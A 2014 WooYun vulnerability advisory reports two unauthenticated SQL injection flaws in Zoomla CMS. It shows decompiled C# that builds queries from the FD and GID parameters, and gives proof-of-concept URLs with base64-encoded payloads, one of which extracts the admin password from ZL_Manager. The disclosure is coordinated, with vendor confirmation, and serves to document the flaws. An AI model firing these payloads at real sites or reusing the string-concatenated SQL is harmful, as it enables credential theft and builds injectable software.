当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071205

漏洞标题:逐浪CMS注入漏洞两处

相关厂商:逐浪CMS

漏洞作者: Vigoss_Z

提交时间:2014-08-09 19:44

修复时间:2014-11-07 19:46

公开时间:2014-11-07 19:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-09: 细节已通知厂商并且等待厂商处理中
2014-08-10: 厂商已经确认,细节仅向厂商公开
2014-08-13: 细节向第三方安全合作伙伴开放
2014-10-04: 细节向核心白帽子及相关领域专家公开
2014-10-14: 细节向普通白帽子公开
2014-10-24: 细节向实习白帽子公开
2014-11-07: 细节向公众公开

简要描述:

无需登录,完美的注射点!

详细说明:

0x1
App_Web_rckpp0om.dll
User_file 类,Page_Load()事件就有问题
if ((base.Request["state"] != null) && (base.Request["state"] == "tr"))
{
string str4 = base.Request.QueryString["FD"];
this.FileUrl = this.FileJiema(str4);
this.hid.Value = str4;
this.file = this.bfile.SelectFile(string.Concat(new object[] { " FileName='", this.FileUrl, "' and userid=", this.ull.GetLogin().UserID }));//注入点
if (this.file.DownUrl == null)
{
base.Response.Write("0");
base.Response.End();
}
看一下bfile.SelectFile(string)函数,拼接SQL语句
public M_File SelectFile(string where)
{
if (where == "")
{
this.sql = "select * from ZL_File";
}
else
{
this.sql = "select * from ZL_File where " + where;
}
M_File file = new M_File();
SqlDataReader reader = SqlHelper.ExecuteReader(CommandType.Text, this.sql);
if (reader.Read())
{
file.UserID = Convert.ToInt32(reader["UserID"]);
file.State = Convert.ToInt32(reader["State"]);
file.ExtractionCode = reader["ExtractionCode"].ToString();
file.DownUrl = reader["DownUrl"].ToString();
file.FileName = reader["FileName"].ToString();
file.FileMD5 = reader["FileMD5"].ToString();
}
return file;
}
base.Request.QueryString["FD"]可控,最喜欢的注入点,base64的注入语句!


搜索一下调用user_file类的文件:url为http://demo.zoomla.cn/common/file.aspx?FD=xxx&state=tr

FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr
FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr


理论上这个点还可以任意文件读取。
0x2

App_Web_acbkzcqn.dll  中的Edit_Statistics类
protected void Page_Load(object sender, EventArgs e)
{
this.GroupID = this.buser.GetLogin().GroupID;
string groupName = this.bGll.GetByID(this.GroupID).GroupName;
if (base.Request.QueryString["GID"] != null)
{
base.Request.QueryString["GID"].ToString();
M_Node nodeXML = this.bll.GetNodeXML(DataConverter.CLng(DataConverter.CLng(base.Request.QueryString["NodeID"])));
XmlDocument document = new XmlDocument();
try
{
document.Load(base.Server.MapPath("/Config/Payment.xml"));
}
catch (Exception)
{
function.WriteErrMsg("出现错误");
}
XmlNode node2 = document.SelectSingleNode("UserGroups/" + function.GetChineseFirstChar(groupName) + "/Manner");
this.Articles = DataConverter.CLng(node2.Attributes["Articles"].Value);
M_Bnum bnum = this.b_EditWord.SelectBnum(string.Concat(new object[] { " datediff(week,browsertime,getdate())=0 and uid=", this.buser.GetLogin().UserID, " and GID=", base.Request.QueryString["GID"], " order by acid desc" }));//注入点
this.BEcount = this.b_EditWord.BnumCount("");
this.NodeBecount = this.b_EditWord.BnumCount("count(distinct(gid))| and nodeid=" + base.Request.QueryString["NodeID"]);


GID注入,前面的NODEID带入正常访问的值即可。
Edit/Statistics.aspx
不测试了,官方修一下吧。

漏洞证明:

http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr

修复方案:

版权声明:转载请注明来源 Vigoss_Z@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-08-10 13:41

厂商回复:

感谢

最新状态:

暂无